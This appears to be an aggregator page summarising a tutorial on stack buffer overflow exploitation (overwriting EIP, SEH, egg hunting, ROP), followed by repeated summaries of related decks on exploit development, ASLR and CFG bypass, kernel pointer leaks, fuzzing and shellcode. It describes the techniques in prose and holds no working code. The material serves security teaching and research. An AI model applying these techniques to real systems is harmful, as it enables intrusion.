This document provides an overview of system hacking and reverse engineering techniques. It introduces various buffer overflow exploitation methods like overwriting the return address, structured exception handling, egg hunting, and return-oriented programming on Windows, Unix-like, and ARM platforms. Specific exploitation steps are demonstrated, such as overwriting the return address in a stack-based buffer overflow to redirect execution to shellcode. The document also provides an example exploit targeting a Windows application vulnerable to a stack-based buffer overflow through crafted playlist files.
System Hacking Tutorial #1 - Introduction to Vulnerability and Type of Vulner...sanghwan ahn
The document discusses system hacking and reverse engineering techniques. It provides an introduction to vulnerabilities and types of vulnerabilities. The document outlines two tracks - the first introduces bugs, crashes, vulnerabilities, exploitation and defense mechanisms. The second track discusses different types of vulnerabilities like buffer overflows, format string bugs, and use-after-free vulnerabilities. It explains the principles and exploitation of stack and heap overflows.
The document discusses system hacking and reverse engineering techniques. It introduces egg hunting, which searches a process's memory to locate and execute injected shellcode when only a small buffer is available for exploitation. Egg hunting code consists of an egg hunter, marker, and shellcode. The egg hunter searches for the marker and jumps to it, then the shellcode executes. Various exploitation techniques are covered for Windows, Unix-like systems and ARM.
Exploit Research and Development Megaprimer: Win32 EgghunterAjin Abraham
Exploit Research and Development Megaprimer
http://opensecurity.in/exploit-research-and-development-megaprimer/
http://www.youtube.com/playlist?list=PLX3EwmWe0cS_5oy86fnqFRfHpxJHjtuyf
Aula sobre vulnerabilidades básicas ministrada na UFPR em 2018.
Introduction to Security class about classical vulnerabilities: TOCTOU, buffer overflow. Attack examples: dirtycow, return2libc, ROP.
This document discusses Return Oriented Programming (ROP), which is a technique for exploiting software vulnerabilities to execute malicious code without injecting new code. It can be done by manipulating return addresses on the program stack to divert execution flow to existing code snippets ("gadgets") that perform the desired task when executed in sequence. The document covers the anatomy of the x86 stack, common ROP attack approaches like stack smashing and return-to-libc, how gadgets work by chaining neutral instructions, and various defenses such as stack canaries, non-executable memory, address space layout randomization, and position-independent executables.
1. The document discusses device drivers in Linux, including file types, driver registration, hotplug, MMC size and partitions, and request queues and elevators.
2. It explains the process of an application opening a device file, how drivers are registered with the kernel, and how devices are handled when hotplugged.
3. Details are provided on how MMC sizes and partitions are represented, and how request queues and elevators are used to process I/O requests to block devices in an efficient manner.
The document describes a simulated hacking game scenario involving a compromised POS terminal infected with malware. It details the components of the botnet architecture including bot nodes, command and control infrastructure, and social media propagation. Diagrams show the network layout and communication channels. The document also examines the bot's components, capabilities, and protection mechanisms such as bytecode encryption and anti-debugging techniques. Hints are provided to help players progress in the game by bypassing defenses and achieving objectives over multiple days.
System Hacking Tutorial #1 - Introduction to Vulnerability and Type of Vulner...sanghwan ahn
The document discusses system hacking and reverse engineering techniques. It provides an introduction to vulnerabilities and types of vulnerabilities. The document outlines two tracks - the first introduces bugs, crashes, vulnerabilities, exploitation and defense mechanisms. The second track discusses different types of vulnerabilities like buffer overflows, format string bugs, and use-after-free vulnerabilities. It explains the principles and exploitation of stack and heap overflows.
The document discusses system hacking and reverse engineering techniques. It introduces egg hunting, which searches a process's memory to locate and execute injected shellcode when only a small buffer is available for exploitation. Egg hunting code consists of an egg hunter, marker, and shellcode. The egg hunter searches for the marker and jumps to it, then the shellcode executes. Various exploitation techniques are covered for Windows, Unix-like systems and ARM.
Exploit Research and Development Megaprimer: Win32 EgghunterAjin Abraham
Exploit Research and Development Megaprimer
http://opensecurity.in/exploit-research-and-development-megaprimer/
http://www.youtube.com/playlist?list=PLX3EwmWe0cS_5oy86fnqFRfHpxJHjtuyf
Aula sobre vulnerabilidades básicas ministrada na UFPR em 2018.
Introduction to Security class about classical vulnerabilities: TOCTOU, buffer overflow. Attack examples: dirtycow, return2libc, ROP.
This document discusses Return Oriented Programming (ROP), which is a technique for exploiting software vulnerabilities to execute malicious code without injecting new code. It can be done by manipulating return addresses on the program stack to divert execution flow to existing code snippets ("gadgets") that perform the desired task when executed in sequence. The document covers the anatomy of the x86 stack, common ROP attack approaches like stack smashing and return-to-libc, how gadgets work by chaining neutral instructions, and various defenses such as stack canaries, non-executable memory, address space layout randomization, and position-independent executables.
1. The document discusses device drivers in Linux, including file types, driver registration, hotplug, MMC size and partitions, and request queues and elevators.
2. It explains the process of an application opening a device file, how drivers are registered with the kernel, and how devices are handled when hotplugged.
3. Details are provided on how MMC sizes and partitions are represented, and how request queues and elevators are used to process I/O requests to block devices in an efficient manner.
The document describes a simulated hacking game scenario involving a compromised POS terminal infected with malware. It details the components of the botnet architecture including bot nodes, command and control infrastructure, and social media propagation. Diagrams show the network layout and communication channels. The document also examines the bot's components, capabilities, and protection mechanisms such as bytecode encryption and anti-debugging techniques. Hints are provided to help players progress in the game by bypassing defenses and achieving objectives over multiple days.
Zero bugs found? Hold my beer AFL! how to improve coverage-guided fuzzing and...Maksim Shudrak
Fuzzing remains to be the most effective technique for bugs hunting in memory-unsafe programs. Last year, hundreds of security papers and talks on fuzzing have been published and dozens of them were focused on adapting or improving American Fuzzy Lop in some way. Attracting with its simplicity and efficiency, AFL is the number one choice for the vast majority of security researchers. This high popularity means that hunting for bugs with AFL or a similar tool is becoming less and less fruitful since many projects are already covered by other researchers. It is especially hard when we talk about a project participating in Google OSS-Fuzz program which utilizes AFL to generate a half-trillion test cases per day.
In practice, this means that we can not blindly rely on AFL anymore and should search for better fuzzing techniques. In order to overcome this challenge, we need to understand how AFL and similar fuzzers work and be able to use their weaknesses to find new 0days. This talk is aimed to discuss these weaknesses on real examples, explain how we can do fuzzing better and release a new open-source fuzzer called Manul.
Manul is a high-scalable coverage-guided parallel fuzzer with the ability to search for bugs in open source and black box binaries on Windows and Linux. Manul was able to find 10 0-days in 4 widely-used projects that have been extensively tested by AFL. These vulnerabilities were not found by chance, but by analyzing and addressing issues exist in AFL. Authors will show several of the most critical vulnerabilities and explain why AFL overlooked them.
This talk will be interested for experienced hackers, who are willing to improve their bug hunting capabilities, as well as for new researchers, who are making their first steps on the thorny trail of bug hunting.
The document discusses various return-oriented programming (ROP) countermeasures, including position independent code (PIE) which randomizes the base address of all segments, making it difficult to predict gadget addresses and rely on bruteforcing. PIE imposes around a 25% performance overhead but is not widely used. Full RELRO prevents PLT/GOT overwrites but does not prevent GOT dereferencing. Stack pivot and return detection are difficult to implement outside of research. For exploitation concerns, PIE is the best available option.
This document discusses RISC-V boot processes using the Berkeley Boot Loader (BBL) and RISC-V Proxy Kernel (PK). It explains how upon reset, code in Machine mode initializes the system and switches to Supervisor mode. The boot loader then loads an application ELF into memory. For BBL, it loads a Linux kernel, and for PK it loads a user application. Control is then transferred to the loaded program in User mode. Trap handling mechanisms involving different privilege modes are also covered.
Fuzzing malware for fun & profit. Applying Coverage-Guided Fuzzing to Find Bu...Maksim Shudrak
The document discusses using coverage-guided fuzzing to find bugs in modern malware. It begins with an introduction and motivation for using fuzzing techniques on malware. It then provides an overview of coverage-guided fuzzing and how it works. Several case studies are presented where coverage-guided fuzzing was used to find vulnerabilities in popular malware samples like Mirai.
This document provides an introduction to the C programming language in Chinese. It discusses downloading and installing Cygwin on Windows to get a development environment for C. It then covers basic C syntax like printf(), variables, conditions, loops, functions, pointers, arrays, and strings. Examples are provided like a program to evaluate poker card values using switches and if/else statements. The document emphasizes learning C through practical examples and exercises.
This document summarizes Intel Nervana Graph, a graph compiler developed by Nervana Systems and now maintained by Intel. It discusses how Nervana Graph can import models from frameworks like Caffe, TensorFlow, MXNet and convert them to an intermediate graph representation. It then describes how different transformers can convert the graph to executable code for CPUs or GPUs. The document provides code examples for using Nervana Graph with Caffe and TensorFlow models and discusses the implementation of the graph transformations and compiler passes.
The document discusses bypassing address space layout randomization (ASLR) on Linux. It begins with a refresher on buffer overflows and modern protections like ASLR and DEP. It then explores finding fixed addresses in the .text section that are not subject to ASLR to redirect execution, such as calls and jumps to registers. The document shows searching binaries for these instruction sequences and checking register values to leverage them for exploiting a vulnerable program while ASLR is enabled.
Leak kernel pointer by exploiting uninitialized uses in Linux kernelJinbumPark
- Leak kernel pointer by exploiting uninitialized uses in Linux kernel.
- Demonstrated on 4 real-world CVEs.
- The tool used for this is available at github.com/jinb-park/leak-kptr
- Bypassing KASLR
- Kernel pointer spraying using ebpf
- Kernel pointer fuzzing using fuzzer
The document discusses different types of shellcodes and their uses. It provides examples of x86 and x86_64 shellcode code to execute a Linux system call. It also lists resources for further information on shellcode design and exploitation techniques.
Chromium Sandbox on Linux (NDC Security 2019)Patricia Aas
The Linux Security and Isolation APIs have become the basis of some of the most useful features server-side, providing the isolation required for efficient containers.
However, these APIs also form the basis of the Chromium Sandbox on Linux, and we will study them in that context in this talk.
The Anatomy of an Exploit (NDC TechTown 2019)Patricia Aas
This document provides an overview of an exploit development process. It begins by discussing how exploits program the "weird machine" of vulnerable programs through memory manipulation. It then walks through developing a stack buffer overflow exploit against a vulnerable C program. Various compiler protections like stack canaries and ASLR are bypassed. The document generates a pattern to find the offset and writes an exploit program to automate writing an exploit string to trigger the vulnerability and redirect execution.
This document discusses bypassing address space layout randomization (ASLR) protections to execute shellcode on the stack. It begins with an overview of stack-based buffer overflows and modern protections like non-executable stacks. It then describes using return-oriented programming (ROP) techniques like ret2libc to hijack control flow and call library functions like system() to spawn a shell. Specifically, it outlines overwriting a return address to call mprotect() to make the stack executable, then jumping to shellcode on the stack. The document provides example exploit code and steps to find needed addresses in memory.
Efficient System Monitoring in Cloud Native EnvironmentsGergely Szabó
This document discusses efficient system monitoring in cloud native environments using eBPF. It provides an overview of eBPF and how it can be used for monitoring applications like Prometheus. Specific topics covered include BPF, Linux kernel tracing using kprobes and tracepoints, eBPF maps and programs, and an example Prometheus exporter that leverages eBPF to export metrics.
This talk will shed some light into the intermediate language that is used inside the Hex-Rays Decompiler. The microcode is simple yet powerful to represent real world programs. We publish it and give programmatic access to it from C++.
BPF (Berkeley Packet Filter) allows for safe dynamic program injection into the Linux kernel. It provides an in-kernel virtual machine and instruction set for running custom programs. The BPF infrastructure includes a verifier that checks programs for safety, helper functions to access kernel APIs, and maps for inter-process communication. BPF has become a core kernel subsystem and is used for applications like XDP, tracing, networking, and more.
This document provides an outline for a Capture the Flag (CTF) event with details on CTF concepts, server setup, and examples of challenges. Some key points:
- It introduces CTFs and the AIS3 final CTF event, which will use a jeopardy style format across categories like Misc, Binary, Pwn, Web, and Crypto.
- It provides instructions for setting up a CTF server on Linux with tricks like disabling stack protectors, allowing code execution in the stack, and disabling address space layout randomization (ASLR) to make challenges simpler.
- It outlines some simple initial challenges like a basic buffer overflow example in C, using cryptography, and two pwn
Advanced cfg bypass on adobe flash player 18 defcon russia 23DefconRussia
This document describes an advanced technique to bypass Control Flow Guard (CFG) protections on Adobe Flash Player 18 and Windows 8.1. It details how the researchers were able to generate indirect call instructions in just-in-time (JIT) compiled Flash code to redirect execution to controlled addresses, bypassing CFG. This was done by manipulating parameters passed between functions to influence the JIT compiler's code generation and produce the desired indirect call opcodes. The technique allowed full control-flow hijacking on the protected systems.
[ZigBee 嵌入式系統] ZigBee 應用實作 - 使用 TI Z-Stack FirmwareSimen Li
The document outlines an application called BasicApp that is used to understand the basic operations of the OSAL (Operating System Abstraction Layer) embedded in the ZigBee firmware. It describes initializing tasks using OSAL, processing events, and handling key presses to control an LED using the HAL (Hardware Abstraction Layer) APIs. The code files for the BasicApp include OSAL_BasicApp.c for task initialization, BasicApp.h for constants and function declarations, and BasicApp.c which implements the task event processing and key handling functions.
The document provides an introduction to exploit development. It discusses preparing a virtual lab with tools like Immunity Debugger, Mona.py, pvefindaddr.py and Metasploit. It covers basic buffer overflow exploitation techniques like overwriting EIP and using RETURN oriented programming. The document demonstrates a basic stack-based buffer overflow exploit against the FreeFloat FTP server as a tutorial, covering steps like generating a cyclic pattern, finding the offset and using mona to find a JMP ESP instruction to redirect execution. It also discusses using msfpayload to generate Windows bind shellcode and msfencode to escape bad characters before testing the proof of concept exploit.
The document provides information on advanced assembly language procedures. It discusses the PROC, ADDR, INVOKE and PROTO directives which are used to declare and call procedures. The PROC directive declares a procedure with optional parameters, while INVOKE simplifies procedure calls by passing parameters in a single statement. PROTO creates a procedure prototype. ADDR returns the address of a variable. Stack frames and how parameters and local variables are accessed on the stack are explained. Recursive procedures and how they use stack frames are covered, with examples to calculate a sum and factorial recursively. Finally, the document discusses creating multimodule programs by dividing code across multiple source files that are assembled and linked together.
Zero bugs found? Hold my beer AFL! how to improve coverage-guided fuzzing and...Maksim Shudrak
Fuzzing remains to be the most effective technique for bugs hunting in memory-unsafe programs. Last year, hundreds of security papers and talks on fuzzing have been published and dozens of them were focused on adapting or improving American Fuzzy Lop in some way. Attracting with its simplicity and efficiency, AFL is the number one choice for the vast majority of security researchers. This high popularity means that hunting for bugs with AFL or a similar tool is becoming less and less fruitful since many projects are already covered by other researchers. It is especially hard when we talk about a project participating in Google OSS-Fuzz program which utilizes AFL to generate a half-trillion test cases per day.
In practice, this means that we can not blindly rely on AFL anymore and should search for better fuzzing techniques. In order to overcome this challenge, we need to understand how AFL and similar fuzzers work and be able to use their weaknesses to find new 0days. This talk is aimed to discuss these weaknesses on real examples, explain how we can do fuzzing better and release a new open-source fuzzer called Manul.
Manul is a high-scalable coverage-guided parallel fuzzer with the ability to search for bugs in open source and black box binaries on Windows and Linux. Manul was able to find 10 0-days in 4 widely-used projects that have been extensively tested by AFL. These vulnerabilities were not found by chance, but by analyzing and addressing issues exist in AFL. Authors will show several of the most critical vulnerabilities and explain why AFL overlooked them.
This talk will be interested for experienced hackers, who are willing to improve their bug hunting capabilities, as well as for new researchers, who are making their first steps on the thorny trail of bug hunting.
The document discusses various return-oriented programming (ROP) countermeasures, including position independent code (PIE) which randomizes the base address of all segments, making it difficult to predict gadget addresses and rely on bruteforcing. PIE imposes around a 25% performance overhead but is not widely used. Full RELRO prevents PLT/GOT overwrites but does not prevent GOT dereferencing. Stack pivot and return detection are difficult to implement outside of research. For exploitation concerns, PIE is the best available option.
This document discusses RISC-V boot processes using the Berkeley Boot Loader (BBL) and RISC-V Proxy Kernel (PK). It explains how upon reset, code in Machine mode initializes the system and switches to Supervisor mode. The boot loader then loads an application ELF into memory. For BBL, it loads a Linux kernel, and for PK it loads a user application. Control is then transferred to the loaded program in User mode. Trap handling mechanisms involving different privilege modes are also covered.
Fuzzing malware for fun & profit. Applying Coverage-Guided Fuzzing to Find Bu...Maksim Shudrak
The document discusses using coverage-guided fuzzing to find bugs in modern malware. It begins with an introduction and motivation for using fuzzing techniques on malware. It then provides an overview of coverage-guided fuzzing and how it works. Several case studies are presented where coverage-guided fuzzing was used to find vulnerabilities in popular malware samples like Mirai.
This document provides an introduction to the C programming language in Chinese. It discusses downloading and installing Cygwin on Windows to get a development environment for C. It then covers basic C syntax like printf(), variables, conditions, loops, functions, pointers, arrays, and strings. Examples are provided like a program to evaluate poker card values using switches and if/else statements. The document emphasizes learning C through practical examples and exercises.
This document summarizes Intel Nervana Graph, a graph compiler developed by Nervana Systems and now maintained by Intel. It discusses how Nervana Graph can import models from frameworks like Caffe, TensorFlow, MXNet and convert them to an intermediate graph representation. It then describes how different transformers can convert the graph to executable code for CPUs or GPUs. The document provides code examples for using Nervana Graph with Caffe and TensorFlow models and discusses the implementation of the graph transformations and compiler passes.
The document discusses bypassing address space layout randomization (ASLR) on Linux. It begins with a refresher on buffer overflows and modern protections like ASLR and DEP. It then explores finding fixed addresses in the .text section that are not subject to ASLR to redirect execution, such as calls and jumps to registers. The document shows searching binaries for these instruction sequences and checking register values to leverage them for exploiting a vulnerable program while ASLR is enabled.
Leak kernel pointer by exploiting uninitialized uses in Linux kernelJinbumPark
- Leak kernel pointer by exploiting uninitialized uses in Linux kernel.
- Demonstrated on 4 real-world CVEs.
- The tool used for this is available at github.com/jinb-park/leak-kptr
- Bypassing KASLR
- Kernel pointer spraying using ebpf
- Kernel pointer fuzzing using fuzzer
The document discusses different types of shellcodes and their uses. It provides examples of x86 and x86_64 shellcode code to execute a Linux system call. It also lists resources for further information on shellcode design and exploitation techniques.
Chromium Sandbox on Linux (NDC Security 2019)Patricia Aas
The Linux Security and Isolation APIs have become the basis of some of the most useful features server-side, providing the isolation required for efficient containers.
However, these APIs also form the basis of the Chromium Sandbox on Linux, and we will study them in that context in this talk.
The Anatomy of an Exploit (NDC TechTown 2019)Patricia Aas
This document provides an overview of an exploit development process. It begins by discussing how exploits program the "weird machine" of vulnerable programs through memory manipulation. It then walks through developing a stack buffer overflow exploit against a vulnerable C program. Various compiler protections like stack canaries and ASLR are bypassed. The document generates a pattern to find the offset and writes an exploit program to automate writing an exploit string to trigger the vulnerability and redirect execution.
This document discusses bypassing address space layout randomization (ASLR) protections to execute shellcode on the stack. It begins with an overview of stack-based buffer overflows and modern protections like non-executable stacks. It then describes using return-oriented programming (ROP) techniques like ret2libc to hijack control flow and call library functions like system() to spawn a shell. Specifically, it outlines overwriting a return address to call mprotect() to make the stack executable, then jumping to shellcode on the stack. The document provides example exploit code and steps to find needed addresses in memory.
Efficient System Monitoring in Cloud Native EnvironmentsGergely Szabó
This document discusses efficient system monitoring in cloud native environments using eBPF. It provides an overview of eBPF and how it can be used for monitoring applications like Prometheus. Specific topics covered include BPF, Linux kernel tracing using kprobes and tracepoints, eBPF maps and programs, and an example Prometheus exporter that leverages eBPF to export metrics.
This talk will shed some light into the intermediate language that is used inside the Hex-Rays Decompiler. The microcode is simple yet powerful to represent real world programs. We publish it and give programmatic access to it from C++.
BPF (Berkeley Packet Filter) allows for safe dynamic program injection into the Linux kernel. It provides an in-kernel virtual machine and instruction set for running custom programs. The BPF infrastructure includes a verifier that checks programs for safety, helper functions to access kernel APIs, and maps for inter-process communication. BPF has become a core kernel subsystem and is used for applications like XDP, tracing, networking, and more.
This document provides an outline for a Capture the Flag (CTF) event with details on CTF concepts, server setup, and examples of challenges. Some key points:
- It introduces CTFs and the AIS3 final CTF event, which will use a jeopardy style format across categories like Misc, Binary, Pwn, Web, and Crypto.
- It provides instructions for setting up a CTF server on Linux with tricks like disabling stack protectors, allowing code execution in the stack, and disabling address space layout randomization (ASLR) to make challenges simpler.
- It outlines some simple initial challenges like a basic buffer overflow example in C, using cryptography, and two pwn
Advanced cfg bypass on adobe flash player 18 defcon russia 23DefconRussia
This document describes an advanced technique to bypass Control Flow Guard (CFG) protections on Adobe Flash Player 18 and Windows 8.1. It details how the researchers were able to generate indirect call instructions in just-in-time (JIT) compiled Flash code to redirect execution to controlled addresses, bypassing CFG. This was done by manipulating parameters passed between functions to influence the JIT compiler's code generation and produce the desired indirect call opcodes. The technique allowed full control-flow hijacking on the protected systems.
[ZigBee 嵌入式系統] ZigBee 應用實作 - 使用 TI Z-Stack FirmwareSimen Li
The document outlines an application called BasicApp that is used to understand the basic operations of the OSAL (Operating System Abstraction Layer) embedded in the ZigBee firmware. It describes initializing tasks using OSAL, processing events, and handling key presses to control an LED using the HAL (Hardware Abstraction Layer) APIs. The code files for the BasicApp include OSAL_BasicApp.c for task initialization, BasicApp.h for constants and function declarations, and BasicApp.c which implements the task event processing and key handling functions.
The document provides an introduction to exploit development. It discusses preparing a virtual lab with tools like Immunity Debugger, Mona.py, pvefindaddr.py and Metasploit. It covers basic buffer overflow exploitation techniques like overwriting EIP and using RETURN oriented programming. The document demonstrates a basic stack-based buffer overflow exploit against the FreeFloat FTP server as a tutorial, covering steps like generating a cyclic pattern, finding the offset and using mona to find a JMP ESP instruction to redirect execution. It also discusses using msfpayload to generate Windows bind shellcode and msfencode to escape bad characters before testing the proof of concept exploit.
The document provides information on advanced assembly language procedures. It discusses the PROC, ADDR, INVOKE and PROTO directives which are used to declare and call procedures. The PROC directive declares a procedure with optional parameters, while INVOKE simplifies procedure calls by passing parameters in a single statement. PROTO creates a procedure prototype. ADDR returns the address of a variable. Stack frames and how parameters and local variables are accessed on the stack are explained. Recursive procedures and how they use stack frames are covered, with examples to calculate a sum and factorial recursively. Finally, the document discusses creating multimodule programs by dividing code across multiple source files that are assembled and linked together.
Slides from JEEConf 2018 talk "Virtual Machine for Regular Expressions". It describes how and why to implement a custom regular expression engine for matching arbitrary sequences.
Presentation on native interfaces for the R programming language given as part of a course in advanced R programming at FHCRC:
https://secure.bioconductor.org/SeattleMay10/
Reversing & Malware Analysis Training Part 4 - Assembly Programming Basicssecurityxploded
This presentation is part of our Reverse Engineering & Malware Analysis Training program.
For more details refer our Security Training page
http://securityxploded.com/security-training.php
The document provides an overview of the C programming language. It states that C was developed in 1972 by Dennis Ritchie at Bell Labs and was used to develop the UNIX operating system. The document then covers various features of C like it being a mid-level programming language, having structured programming, pointers, loops, functions, arrays, and more. It provides examples to explain concepts like input/output functions, data types, operators, control structures, and pointers.
The document provides information about a reversing and malware analysis training program. It begins with a disclaimer stating that the views expressed are solely of the trainer and not the company. It then acknowledges those who supported the training program. It states that the presentation is part of a reversing and malware analysis training program currently only offered locally for free. It introduces the two trainers and provides their backgrounds and contact information. It outlines topics that will be covered including x86 assembly, instructions, stack operations, and calling conventions. It notes that a demonstration will be included.
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...Vincenzo Iozzo
Charlie Miller and Vincenzo Iozzo presented techniques for post-exploitation on the iPhone 2 including:
1. Running arbitrary shellcode by overwriting memory protections and calling vm_protect to mark pages as read/write/executable.
2. Loading an unsigned dynamic library called Meterpreter by mapping it over an existing signed library, patching dyld to ignore code signing, and forcing unloaded of linked libraries.
3. Adding new functionality to Meterpreter, such as a module to vibrate and play a sound on the iPhone, demonstrating how payloads can be extended once loaded into memory.
Pragmatic Optimization in Modern Programming - Demystifying the CompilerMarina Kolpakova
This document discusses compiler optimizations. It begins with an outline of topics including compilation trajectory, intermediate languages, optimization levels, and optimization techniques. It then provides more details on each phase of compilation, how compilers use intermediate representations to perform optimizations, and specific optimizations like common subexpression elimination, constant propagation, and instruction scheduling.
QEMU is an open source system emulator that uses just-in-time (JIT) compilation to achieve high performance system emulation. It works by translating target CPU instructions to simple host CPU micro-operations at runtime. These micro-operations are cached and chained together into basic blocks to reduce overhead. This approach avoids the performance issues of traditional emulators by removing interpretation overhead and leveraging CPU parallelism through pipelining of basic blocks.
ROPInjector is a tool that uses return-oriented programming (ROP) to polymorphically inject malware payloads into benign portable executable (PE) files to evade antivirus detection. It works by analyzing the malware shellcode, finding ROP gadgets in the PE, transforming the shellcode into an equivalent ROP chain, injecting any missing gadgets, assembling the ROP chain building code, and patching the modified PE. Evaluation on VirusTotal showed the tool was able to evade detection from antivirus engines an average of 99.31% of the time when injecting two malware payloads into various PE files.
Sergi Álvarez & Roi Martín - Radare2 Preview [RootedCON 2010]RootedCON
Hace aproximadamente 1 año empezó radare2, un desarrollo paralelo a radare, orientado a ofrecer una API genérica y simple para C, Vala, Genie, python, perl y ruby con el fin de mantener el mínimo de código y presentar un acceso genérico a backends de debugging, formato de fichero, arquitectura, etc.
El framework facilita el uso de plugins o scripting para usar diversos backends de ensamblar/desensamblar, analizar cabeceras, emular, depurar, analizar código, buscar patrones, secuencias binarias entre otras.
Diseñado para ser portable entre múltiples arquitecturas y sistemas operativos, entre ellos, Linux, BSD, Solaris, Windows, x86-32/64, ARM, PowerPC y MIPS.
En la charla se presentará el conjunto de librerías y ejemplos prácticos de uso de esta herramienta.
This document provides an introduction to software exploitation on Linux 32-bit systems. It covers common exploitation techniques like buffer overflows, format strings, and ret2libc attacks. It discusses the Linux memory layout and stack structure. It explains buffer overflows on the stack and heap, and how to leverage them to alter control flow and execute arbitrary code. It also covers the format string vulnerability and how to leak information or write to arbitrary memory locations. Tools mentioned include GDB, exploit-exercises, and Python. Overall it serves as a crash course on the basic techniques and concepts for Linux exploitation.
This document discusses buffer overflow attacks. It begins with an introduction that defines a buffer overflow and examples like the Morris worm. It then explains how buffer overflows work by corrupting the stack and overwriting return addresses. Methods for implementing buffer overflows using Metasploit and injecting shellcode are provided. Countermeasures like stack canaries and bounds checking are described. The document concludes that while defenses have improved, legacy systems remain vulnerable and buffer overflows remain a problem.
The document discusses various methods of writing and assembling a simple "Hello World" program in x86 Assembly using NASM, including:
1) Using Linux system calls to write to stdout and exit
2) Using Win32 system calls and avoiding interrupts
3) Using C library functions like printf and linking with gcc for cross-platform compatibility
This document discusses return-oriented programming (ROP) attacks and variants. It begins with an introduction to ROP attacks, explaining that they circumvent data execution prevention by chaining small snippets of executable code (called gadgets) that end in return instructions. It then covers different ROP attack techniques like using arithmetic, comparison, and loop gadgets to achieve Turing completeness. The document discusses challenges like handling null bytes and describes variants like jump-oriented programming (JOP) that uses indirect jumps. It also covers creating alphanumeric ROP shellcode by selecting printable addresses. In the end, it provides tips for effectively searching gadgets.
A short and fast journey through some of the profiling options available in the Ruby 2.x world, including a look at flamegraphs and new ways of tracking memory usage in the MRI.
Return-to-libc attacks allow executing existing library code by overwriting the return address on the stack to point to library functions like system(). This bypasses non-executable stack protections. The attack involves: 1) Finding addresses of system() and the "/bin/sh" string, 2) Calculating where to put the "/bin/sh" address as system()'s argument, 3) Crafting an exploit to overwrite the return address and launch the attack. This technique can be generalized to return-oriented programming which chains multiple short instruction sequences from libraries.
This talk is all about the Berkeley Packet Filters (BPF) and their uses in Linux.
Agenda:
* What is a BPF and why do we need it?
* Writing custom BPFs
* Notes on BPF implementation in the kernel
* Usage examples: SOCKET_FILTER & seccomp
Speaker:
Kfir Gollan, senior embedded software developer, Linux kernel hacker and software team leader.
Similar to System Hacking Tutorial #2 - Buffer Overflow - Overwrite EIP (20)
Malibou Pitch Deck For Its €3M Seed Roundsjcobrien
French start-up Malibou raised a €3 million Seed Round to develop its payroll and human resources
management platform for VSEs and SMEs. The financing round was led by investors Breega, Y Combinator, and FCVC.
Everything You Need to Know About X-Sign: The eSign Functionality of XfilesPr...XfilesPro
Wondering how X-Sign gained popularity in a quick time span? This eSign functionality of XfilesPro DocuPrime has many advancements to offer for Salesforce users. Explore them now!
Need for Speed: Removing speed bumps from your Symfony projects ⚡️Łukasz Chruściel
No one wants their application to drag like a car stuck in the slow lane! Yet it’s all too common to encounter bumpy, pothole-filled solutions that slow the speed of any application. Symfony apps are not an exception.
In this talk, I will take you for a spin around the performance racetrack. We’ll explore common pitfalls - those hidden potholes on your application that can cause unexpected slowdowns. Learn how to spot these performance bumps early, and more importantly, how to navigate around them to keep your application running at top speed.
We will focus in particular on tuning your engine at the application level, making the right adjustments to ensure that your system responds like a well-oiled, high-performance race car.
UI5con 2024 - Bring Your Own Design SystemPeter Muessig
How do you combine the OpenUI5/SAPUI5 programming model with a design system that makes its controls available as Web Components? Since OpenUI5/SAPUI5 1.120, the framework supports the integration of any Web Components. This makes it possible, for example, to natively embed own Web Components of your design system which are created with Stencil. The integration embeds the Web Components in a way that they can be used naturally in XMLViews, like with standard UI5 controls, and can be bound with data binding. Learn how you can also make use of the Web Components base class in OpenUI5/SAPUI5 to also integrate your Web Components and get inspired by the solution to generate a custom UI5 library providing the Web Components control wrappers for the native ones.
Top Benefits of Using Salesforce Healthcare CRM for Patient Management.pdfVALiNTRY360
Salesforce Healthcare CRM, implemented by VALiNTRY360, revolutionizes patient management by enhancing patient engagement, streamlining administrative processes, and improving care coordination. Its advanced analytics, robust security, and seamless integration with telehealth services ensure that healthcare providers can deliver personalized, efficient, and secure patient care. By automating routine tasks and providing actionable insights, Salesforce Healthcare CRM enables healthcare providers to focus on delivering high-quality care, leading to better patient outcomes and higher satisfaction. VALiNTRY360's expertise ensures a tailored solution that meets the unique needs of any healthcare practice, from small clinics to large hospital systems.
For more info visit us https://valintry360.com/solutions/health-life-sciences
WWDC 2024 Keynote Review: For CocoaCoders AustinPatrick Weigel
Overview of WWDC 2024 Keynote Address.
Covers: Apple Intelligence, iOS18, macOS Sequoia, iPadOS, watchOS, visionOS, and Apple TV+.
Understandable dialogue on Apple TV+
On-device app controlling AI.
Access to ChatGPT with a guest appearance by Chief Data Thief Sam Altman!
App Locking! iPhone Mirroring! And a Calculator!!
Most important New features of Oracle 23c for DBAs and Developers. You can get more idea from my youtube channel video from https://youtu.be/XvL5WtaC20A
When it is all about ERP solutions, companies typically meet their needs with common ERP solutions like SAP, Oracle, and Microsoft Dynamics. These big players have demonstrated that ERP systems can be either simple or highly comprehensive. This remains true today, but there are new factors to consider, including a promising new contender in the market that’s Odoo. This blog compares Odoo ERP with traditional ERP systems and explains why many companies now see Odoo ERP as the best choice.
What are ERP Systems?
An ERP, or Enterprise Resource Planning, system provides your company with valuable information to help you make better decisions and boost your ROI. You should choose an ERP system based on your company’s specific needs. For instance, if you run a manufacturing or retail business, you will need an ERP system that efficiently manages inventory. A consulting firm, on the other hand, would benefit from an ERP system that enhances daily operations. Similarly, eCommerce stores would select an ERP system tailored to their needs.
Because different businesses have different requirements, ERP system functionalities can vary. Among the various ERP systems available, Odoo ERP is considered one of the best in the ERp market with more than 12 million global users today.
Odoo is an open-source ERP system initially designed for small to medium-sized businesses but now suitable for a wide range of companies. Odoo offers a scalable and configurable point-of-sale management solution and allows you to create customised modules for specific industries. Odoo is gaining more popularity because it is built in a way that allows easy customisation, has a user-friendly interface, and is affordable. Here, you will cover the main differences and get to know why Odoo is gaining attention despite the many other ERP systems available in the market.
E-Invoicing Implementation: A Step-by-Step Guide for Saudi Arabian CompaniesQuickdice ERP
Explore the seamless transition to e-invoicing with this comprehensive guide tailored for Saudi Arabian businesses. Navigate the process effortlessly with step-by-step instructions designed to streamline implementation and enhance efficiency.
Transform Your Communication with Cloud-Based IVR SolutionsTheSMSPoint
Discover the power of Cloud-Based IVR Solutions to streamline communication processes. Embrace scalability and cost-efficiency while enhancing customer experiences with features like automated call routing and voice recognition. Accessible from anywhere, these solutions integrate seamlessly with existing systems, providing real-time analytics for continuous improvement. Revolutionize your communication strategy today with Cloud-Based IVR Solutions. Learn more at: https://thesmspoint.com/channel/cloud-telephony
What to do when you have a perfect model for your software but you are constrained by an imperfect business model?
